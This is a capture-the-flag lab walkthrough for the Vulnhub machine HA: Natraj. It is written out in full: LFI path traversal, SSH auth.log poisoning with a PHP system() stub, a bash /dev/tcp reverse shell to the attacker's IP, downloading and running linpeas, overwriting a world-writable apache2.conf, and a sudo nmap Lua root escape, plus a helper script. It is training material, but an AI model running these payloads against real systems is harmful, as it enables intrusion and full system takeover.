vulnhub HA: Natraj
2022-07-03 04:16:00 [Fairy elephant]
Attack path:
nmap scan -> dirb scan of the web directories -> fuzz the URL parameter name with ffuf -> LFI plus a poisoned auth.log to get a reverse shell -> edit the world-writable /etc/apache2/apache2.conf to get a shell as mahakal -> sudo nmap to root
Environment:
Target: 192.168.101.78
Attacker: 192.168.101.34
Steps:
1. nmap scan
sudo nmap -sV -sC -p- 192.168.101.78
2. Scan the web directories with dirb
dirb http://192.168.101.78
The scan turns up the directory http://192.168.101.78/console/
Opening it in the browser shows a file named file.php
A script called file.php that takes a file name is a classic sign of a local file inclusion (LFI) bug
3. Brute-force the URL parameter name with ffuf
ffuf -u 'http://192.168.101.78/console/file.php?FUZZ=../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 0
FUZZ is the placeholder that ffuf replaces with each word of the list; here it stands in for the parameter name. -fs 0 filters out responses with an empty body, so only a parameter name that actually makes file.php return something is reported
The parameter name found is file
Open http://192.168.101.78/console/file.php?file=../../../../etc/passwd in the browser
The contents of the target's /etc/passwd are displayed, which confirms both the inclusion and the path traversal
4. Get a reverse shell with the SSH authentication log and the LFI
Open http://192.168.101.78/console/file.php?file=../../../../var/log/auth.log in the browser; the log is readable through the LFI
Try an SSH login as natraj with a wrong password (the real one is unknown anyway)
ssh natraj@192.168.101.78
Then reload http://192.168.101.78/console/file.php?file=../../../../var/log/auth.log in the browser: /var/log/auth.log now contains a line recording the username of the failed SSH login
sshd writes the offered username into the log verbatim, so PHP code can be supplied as the SSH username. It lands in /var/log/auth.log, and including that file through the LFI makes the PHP interpreter execute it (log poisoning)
Log in over SSH with the username "<?php system(\$_GET[xiannv]); ?>" and any password (the backslash only stops the local shell from expanding $_GET; the username sent to the target is the plain PHP stub)
ssh "<?php system(\$_GET[xiannv]); ?>"@192.168.101.78
Open http://192.168.101.78/console/file.php?file=../../../../var/log/auth.log&xiannv=id in the browser
The output of id appears in the page, so the injected PHP code is executed
Next, listen on port 8888 on the attacker
nc -nlvp 8888
Then request the same URL in the browser, with the xiannv parameter set to the URL-encoded form of the command below
before encoding, the value of xiannv is bash -c 'exec bash -i &>/dev/tcp/192.168.101.34/8888 <&1'
The reverse shell arrives on the listener
5. Edit /etc/apache2/apache2.conf to get a shell as mahakal
Fetch linpeas.sh from the attacker
First serve the directory containing linpeas.sh over HTTP on the attacker, for example
python2 -m SimpleHTTPServer 80
Then, in the target's shell (as www-data, in /tmp), download and run linpeas.sh to look for possible escalation paths
wget http://192.168.101.34/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
linpeas.sh flags /etc/apache2/apache2.conf as a file with mode 777 (world-writable); it is the main configuration file of apache2
In this file the User directive sets the user that the child processes which actually serve requests run as, and the Group directive sets their group.
The original values of the two directives are shown below. The reverse shell from step 4 is spawned by one of those child processes, so changing the two values changes the user and group that shell runs as.
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
I tried natraj, root and mahakal here; only mahakal worked.
With natraj you do get a reverse shell as natraj, but natraj cannot run any command with sudo (or sudo -l asks for a password; I no longer remember which of the two);
With root, the main page (http://192.168.101.78) still opens but http://192.168.101.78/console/file.php no longer does. I did not work out why at the time; the most likely cause is that Apache refuses to serve requests from a worker running as root unless it was built with -DBIG_SECURITY_HOLE.
Because vim cannot be used from the target's shell, I copied /etc/apache2/apache2.conf to the attacker, changed User and Group to mahakal, and saved it
User mahakal
Group mahakal
Then, in /tmp on the target, download the modified apache2.conf from the attacker and copy it over /etc/apache2/apache2.conf (cp rewrites the existing, writable file in place, which works even when the directory itself is not writable)
wget http://192.168.101.34/apache2.conf
cp /tmp/apache2.conf /etc/apache2/apache2.conf
Apache only reads apache2.conf at startup, so it has to be restarted, but www-data has no permission to restart apache2, nor to reboot the system; the only option left was to reboot the virtual machine from VMware.
After the reboot, repeat the reverse-shell procedure from step 4; the worker processes now run as mahakal, so the shell obtained is a mahakal shell.
Run sudo -l
It shows that mahakal can run nmap with sudo
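The two things that step 5 relies on, finding world-writable files under /etc (what linpeas reported here) and rewriting the User/Group directives without an editor, as a script. This is an added example, not code from the writeup; the function names and the RUNAS / APACHE_CONF variables are my own. The rewrite deliberately writes through `cat >` into the existing file: the file is writable, but a new file in /etc/apache2 (which `sed -i` and `mv` both need) is not something www-data can create.

```shell
#!/bin/sh
# Added example (not from the original writeup). RUNAS and APACHE_CONF are my own
# variable names; the defaults match the target in the writeup.
set -u

# Regular files under /etc that any user can write. apache2.conf showing up in
# this list is the finding linpeas made on the target.
writable_etc_files() {
  find /etc -xdev -type f -perm -0002 2>/dev/null
}

# Print the User/Group directives of an Apache main config (commented lines excluded).
apache_runas() {   # $1 = path to apache2.conf
  grep -E '^[[:space:]]*(User|Group)[[:space:]]' "$1"
}

# Set both directives to $2. Written through `cat >` rather than `sed -i` or `mv`:
# those create a new file next to the config, which needs write access to the
# directory; overwriting the existing world-writable file keeps its inode and only
# needs write access to the file. $2 must not contain '/' or '&' (sed metacharacters).
set_apache_runas() {   # $1 = conf path, $2 = user and group name
  tmp=$(mktemp) || return 1
  if sed -E "s/^[[:space:]]*User[[:space:]].*/User $2/; s/^[[:space:]]*Group[[:space:]].*/Group $2/" \
       "$1" > "$tmp" && cat "$tmp" > "$1"; then
    rm -f "$tmp"
    return 0
  fi
  rm -f "$tmp"
  return 1
}

# Usage on the target: RUNAS=mahakal sh apache_runas.sh
# Apache reads the file only on (re)start, so the change is live after the next
# restart; an unprivileged shell cannot trigger that, which is why the writeup
# rebooted the VM.
if [ -n "${RUNAS:-}" ]; then
  conf=${APACHE_CONF:-/etc/apache2/apache2.conf}
  [ -w "$conf" ] || { echo "$conf is not writable by $(id -un)" >&2; exit 1; }
  set_apache_runas "$conf" "$RUNAS" && apache_runas "$conf"
fi
```

Before applying anything, `writable_etc_files` is worth a look on its own: any service that re-reads a world-writable file under /etc is the same escalation, not just Apache.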
6. Privilege escalation with sudo nmap
GTFOBins lists nmap as a binary that can escalate privileges through sudo
Following the GTFOBins entry, run the following commands in order (as mahakal, from /var/www/html/console)
TF=$(mktemp)
echo 'os.execute("/bin/bash")' > $TF
sudo nmap --script=$TF
nmap's --script option runs NSE scripts, which are Lua, so os.execute spawns /bin/bash with the root privileges sudo granted to nmap; the result is a root shell (input echo is disabled in that shell, as GTFOBins notes)
Proof: /root/root.txt